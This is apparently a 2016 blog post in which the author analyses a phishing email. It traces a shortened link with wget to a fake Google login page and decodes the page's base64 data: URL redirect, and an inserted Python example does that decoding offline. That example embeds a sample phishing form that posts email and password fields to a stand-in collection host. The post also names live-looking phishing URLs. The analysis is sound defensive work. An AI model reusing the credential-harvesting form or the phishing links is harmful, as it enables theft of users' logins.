Friday, February 12, 2016

Phishing Email

I got an email today that looks like spam. However, Google didn't mark it as spam, which it usually does, so I took a few notes while working out what this email is.

Email

Instead of using flashy wording, the content says that I have to log in somewhere in order to get my mail back. However, I checked the sender's domain, "hawaiiantel.net", and I am sure that I've never used any service from them. More generally, we can't fully trust that spam won't be sent from domains that "look safe". That is, even if the mail comes from someone we know, we still have to be careful.



External Link

Don't click on the link if we don't trust it at this point. Instead, copy the link and read it to understand who is hosting it. What I got is "http://ow.ly/YeNWT", which looks like a shortened URL hiding the real one. Ordinary senders rarely do this, since there's no benefit in this case; it's also always better to use URLs on the company's own domain so that people can trust them.



So, instead of using my usual browser, which holds my cookies for many different websites, I used Tor Browser to keep myself safe.

Analyzing the Site - Routing


After seeing the page in Tor Browser, it's almost 100% certain that this is a phishing site. However, to understand it better, we can trace how its URL redirection works using the following output:

> wget http://ow.ly/YeNWT
--2016-02-12 14:17:58--  http://ow.ly/YeNWT
Resolving ow.ly (ow.ly)... 54.67.120.65, 54.183.130.144, 54.183.131.91, ...
Connecting to ow.ly (ow.ly)|54.67.120.65|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://hannahreade.co.uk/WT/orin.htm [following]
--2016-02-12 14:17:59--  http://hannahreade.co.uk/WT/orin.htm
Resolving hannahreade.co.uk (hannahreade.co.uk)... 50.115.112.7
Connecting to hannahreade.co.uk (hannahreade.co.uk)|50.115.112.7|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 102999 (101K) [text/html]

By requesting "http://ow.ly/YeNWT", I was redirected to "http://hannahreade.co.uk/WT/orin.htm". "hannahreade.co.uk" looks like a normal website, and if so, the site may have been hacked.

Analyzing the Site - Purpose

Like most phishing websites, the purpose of this site is to harvest users' account names and passwords by imitating a real site. The site looks exactly like the Google login page; however, nothing is actually the same besides its layout. We can tell this simply by reading the URL, or by typing a wrong password and seeing what happens.

In this case, I could log in without typing a correct password. Then, the second page asked for my cell phone number. Of course, I could go on to the next page by giving a random cell number (even in a wrong phone-number format). Finally, the site gave me a blank page after I had entered all this information, which is what these sites usually do. The user may just get confused and ignore this without thinking too much, while the account username and password have already been sent to the attacker.



Analyzing the Site - Code

That's pretty much it so far; however, it is still nice to go through their code a little. After I fetched the phishing site with "wget", I got the raw file of the page. This is its second line:

<meta http-equiv="Refresh" content="1; url=data:text/html;base64, 77u/IA0KPC...

The page redirects to another URL, "data:text/html;base64, ....", which isn't a hyperlink to another site but a URL that contains the whole page itself as a raw base64 string. When the URL is opened in a browser, the raw string is decoded back into HTML.
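As an added example (my own code, not the phishing kit's or the author's), the script below pulls the data: URL out of such a meta refresh and decodes it offline, so the inner page can be read without a browser rendering it. The sample page and the "phish.example" form action are constructed; the payload is built to start with a UTF-8 BOM, so its base64 begins with "77u/" exactly like the quoted line.

```python
import base64
import re
from typing import List, Optional

# Constructed sample page shaped like the one described above: its meta refresh
# points at a data: URL whose base64 payload is a constructed login form, not
# the real kit's content. The payload starts with a UTF-8 BOM, so its base64
# begins with "77u/" just like the quoted line.
INNER_HTML = (
    "\ufeff \r\n<!DOCTYPE html><html><body>"
    '<form action="http://phish.example/collect.php" method="post">'
    '<input name="Email"><input name="Passwd" type="password"></form>'
    "</body></html>"
)
SAMPLE_PAGE = (
    "<html><head>\n"
    '<meta http-equiv="Refresh" content="1; url=data:text/html;base64, '
    + base64.b64encode(INNER_HTML.encode("utf-8")).decode("ascii")
    + '">\n</head></html>'
)

META_REFRESH_RE = re.compile(
    r'<meta[^>]*http-equiv=["\']?refresh["\']?[^>]*content=["\']([^"\']+)["\']',
    re.IGNORECASE | re.DOTALL,
)
FORM_ACTION_RE = re.compile(r'<form[^>]*action=["\']([^"\']+)["\']', re.IGNORECASE)


def extract_refresh_target(page: str) -> Optional[str]:
    """Return the url=... target of a meta refresh, or None if the page has none."""
    match = META_REFRESH_RE.search(page)
    if not match:
        return None
    content = match.group(1)
    idx = content.lower().find("url=")
    return content[idx + 4:].strip() if idx >= 0 else None


def decode_data_html(target: str) -> str:
    """Decode a data:text/html;base64,... URL into HTML without a browser rendering it."""
    if not target.lower().startswith("data:"):
        raise ValueError("not a data: URL")
    header, _, payload = target[5:].partition(",")
    if ";base64" not in header.lower():
        return payload  # non-base64 data: URL: the payload already is the markup
    # b64decode discards the stray space after the comma; utf-8-sig drops the BOM.
    return base64.b64decode(payload).decode("utf-8-sig", errors="replace")


def form_actions(decoded_html: str) -> List[str]:
    """List where the decoded page's forms would submit the entered credentials."""
    return FORM_ACTION_RE.findall(decoded_html)
```

Run against a saved copy of the page, the form actions tell you where the credentials would have gone, which is the indicator worth reporting.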

However, part of that code was an encoded JS block which hides the further details.



To find out who the attacker is, we could decode everything on the site, or we could monitor the packets transiting between my laptop and any external services. However, I am not going into this now, and may continue this work another day.

Sum Up

Spam doesn't do harm if you understand what's going on. From this case, we can learn that we should:
  • check the sender's domain
  • open suspicious URLs in Tor Browser
  • be wary of the URL
  • mark spam in Gmail when you find it, which helps Google stop it spreading to other people